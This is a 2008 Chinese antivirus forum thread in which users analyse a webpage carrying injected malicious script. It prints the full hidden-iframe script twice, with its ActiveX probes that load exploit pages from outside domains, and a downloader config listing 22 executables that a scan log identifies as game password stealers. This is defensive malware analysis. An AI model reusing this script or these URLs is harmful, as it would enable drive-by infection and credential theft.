楼主: 御擎
收起左侧

[已鉴定] 微点在此网页报毒

 关闭 [复制链接]
killloop
发表于 2008-11-17 20:30:39 | 显示全部楼层
n.exe - 可能是 Win32/TrojanDownloader.Flux 特洛伊木马 的变种
雨宫优子
发表于 2008-11-17 20:39:32 | 显示全部楼层
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/flash01.htm></iframe>"); window.status="完成"; window.onerror=function(){return true;} if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1) document.write("<iframe width=0 height=0 src=http://net.fql12.cn/614.htm></iframe>"); try{var n; var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");} catch(n){}; finally{if(n!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/ff.htm></iframe>");}} try{var w; var ml=new ActiveXObject("D"+"PC"+"lie"+"nt.Vod");} catch(w){}; finally{if(w!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/xunlei.htm></iframe>");}} try{var g; var gl=new ActiveXObject("GLIEDow"+"n.IEDown.1");} catch(g){}; finally{if(g!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/mi.htm></iframe>");}} function test() { rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "E" + "R" + "P" + "C" + "t" + "l." + "1"; try { Like = new ActiveXObject(rrooxx); }catch(error){return;} vvvvv = Like.PlayerProperty("PRODUCTVERSION"); if(vvvvv<="6.0.14.552") document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real10.htm></iframe>"); else document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real11.htm></iframe>"); } test();

话说这个加密解密有点点难...我这个浏览器也不争气...解这个东西居然解死机了...
关于:hxxp://www.xywai.cn/Topic.aspx?BoardID=7&TopicID=986解密的日志(全体输出-  16):
Level 1>http://net.fql12.cn/flash01.htm
Level 2>http://net.fql12.cn/f22.html
Level 3>http://net.fql12.cn/swfobject.js
Level 2>http://net.fql12.cn/f11.html
Level 1>http://net.fql12.cn/614.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/ff.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/xunlei.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/mi.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/real10.htm
Level 2>http://net.fql11.cn/n.exe  ●
Level 1>http://net.fql12.cn/real11.htm
Level 2>http://net.fql11.cn/n.exe  ●
这个新版似乎不错...

[ 本帖最后由 aarwwefdds 于 2008-11-17 20:51 编辑 ]
tanlimo
发表于 2008-11-17 20:46:03 | 显示全部楼层
http://nx.yal99.cn/soft//update.txt


  1. [update] ver=2008111403 url=http://nx.yal99.cn/soft/soft/acab7e5515e97a02.exe updatetimer=120 [startpage] startpage=0 url=ssssssssssssssssssss [desktop] desktop=0 title1=ww url1=http:// count=1 [file] file=1 file1=http://ad3.fql13.cn/mh.exe filename1=ffsea1.exe ftime1=3 file2=http://ad3.fql13.cn/wd.exe filename2=ffsea2.exe ftime2=3 file3=http://ad3.fql13.cn/zt.exe filename3=ffsea3.exe ftime3=3 file4=http://ad3.fql13.cn/my.exe filename4=ffsea4.exe ftime4=3 file5=http://ad3.fql13.cn/dxc.exe filename5=ffsea5.exe ftime5=3 file6=http://ad3.fql13.cn/wm.exe filename6=ffsea6.exe ftime6=3 file7=http://ad.fql13.cn/jx.exe filename7=ffsea7.exe ftime7=3 file8=http://ad3.fql13.cn/tl.exe filename8=ffsea8.exe ftime8=3 file9=http://ad3.fql13.cn/qqhx.exe filename9=ffsea9.exe ftime9=3 file10=http://ad.fql13.cn/zx.exe filename10=ffsea10.exe ftime10=3 file11=http://ad3.fql13.cn/wow.exe filename11=ffsea11.exe ftime11=4 file12=http://ad3.fql13.cn/xx.exe filename12=ffsea12.exe ftime12=4 file13=http://ad3.fql13.cn/kdxy.exe filename13=ffsea13.exe ftime13=4 file14=http://ad3.fql13.cn/cqwz.exe filename14=ffsea14.exe ftime14=4 file15=http://ad3.fql13.cn/dj.exe filename15=ffsea15.exe ftime15=4 file16=http://ad3.fql13.cn/cb.exe filename16=ffsea16.exe ftime16=4 file17=http://ad3.fql13.cn/cs.exe filename17=ffsea17.exe ftime17=4 file18=http://ad3.fql13.cn/dh.exe filename18=ffsea18.exe ftime18=4 file19=http://ad.fql13.cn/qqsg.exe filename19=ffsea19.exe ftime19=4 file20=http://ad.fql13.cn/jh.exe filename20=ffsea20.exe ftime20=4 file21=http://ad3.fql13.cn/wl.exe filename21=ffsea21.exe ftime21=4 file22=http://ad3.fql13.cn/cq.exe filename22=ffsea22.exe ftime22=4 count=22 [count] count=0 mecount=0 url=http://nx.yal99.cn/soft/count/count.asp
复制代码
tanlimo
发表于 2008-11-17 20:59:21 | 显示全部楼层
正在扫描日志
病毒库版本: 3617 (20081117)
日期: 2008-11-17  时间: 21:01:08
已扫描的磁盘、文件夹和文件: K:\23.rar
K:\23.rar > RAR > acab7e5515e97a02.exe - 可能是 Win32/TrojanDownloader.Flux 特洛伊木马 的变种
K:\23.rar > RAR > cb.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > cq.exe - 未查明的 NewHeur_PE 病毒 [7]
K:\23.rar > RAR > cqwz.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > cs.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > dh.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > dj.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > dxc.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > jh.exe - 可能是 Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > jx.exe - Win32/PSW.OnLineGames.NRF 特洛伊木马 的变种
K:\23.rar > RAR > kdxy.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > mh.exe - Win32/PSW.OnLineGames.NRF 特洛伊木马 的变种
K:\23.rar > RAR > my.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > qqhx.exe - 可能是 Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > qqsg.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > tl.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > wd.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > wl.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > wm.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
K:\23.rar > RAR > wow.exe - 可能是 Win32/PSW.OnLineGames.MUG 特洛伊木马 的变种
K:\23.rar > RAR > xx.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > zt.exe - Win32/PSW.OnLineGames.NXI 特洛伊木马 的变种
K:\23.rar > RAR > zx.exe - Win32/PSW.OnLineGames.NSG 特洛伊木马 的变种
已扫描的对象数: 23
发现的威胁数: 23
已清除对象数:0
完成时间: 21:01:19  总扫描时间: 11 秒 (00:00:11)
备注:
[7] 对象可能感染了未知病毒。





没讯雷的情况下打包真累


23.rar (330.25 KB, 下载次数: 37)
ngh55
发表于 2008-11-17 21:21:44 | 显示全部楼层
FF浏览器打开,伞没反应
lg560852
发表于 2008-11-17 22:43:08 | 显示全部楼层

那个文件实在找不到

<SCRIPT>
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/flash01.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("ms"+"ie 7")==-1)
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/614.htm></iframe>");
try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/ff.htm></iframe>");}}
try{var w;
var ml=new ActiveXObject("D"+"PC"+"lie"+"nt.Vod");}
catch(w){};                     
finally{if(w!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/xunlei.htm></iframe>");}}
try{var g;
var gl=new ActiveXObject("GLIEDow"+"n.IEDown.1");}
catch(g){};                     
finally{if(g!="[object Error]"){document.write("<iframe width=0 height=0 src=http://net.fql12.cn/mi.htm></iframe>");}}
function test()
{
rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "E" + "R" + "P" + "C" + "t" + "l." + "1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552")
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real10.htm></iframe>");
else
document.write("<iframe width=0 height=0 src=http://net.fql12.cn/real11.htm></iframe>");
}
test();
</SCRIPT>
</HEAD>
</HTML>

样本就是8楼发的那个。
lg560852
发表于 2008-11-17 22:46:54 | 显示全部楼层

回复 12楼 aarwwefdds 的帖子

囧了,我也用过这个,可没解出来,是不是需要设置什么?
尤金卡巴斯基
发表于 2008-11-17 22:52:05 | 显示全部楼层
2008/11/17 22:50:57        已删除        木马程序 Trojan.Win32.AntiAV.st        G:\Temp\Virus\n.exe//ASPack
shmily512099
发表于 2008-11-17 22:56:34 | 显示全部楼层
100%的挂马了  


微点报警了!
夜雨风声
发表于 2008-11-18 00:14:27 | 显示全部楼层
反正我已经去,,微点还没来得及报,,,node32就报了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 06:42 , Processed in 0.134309 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表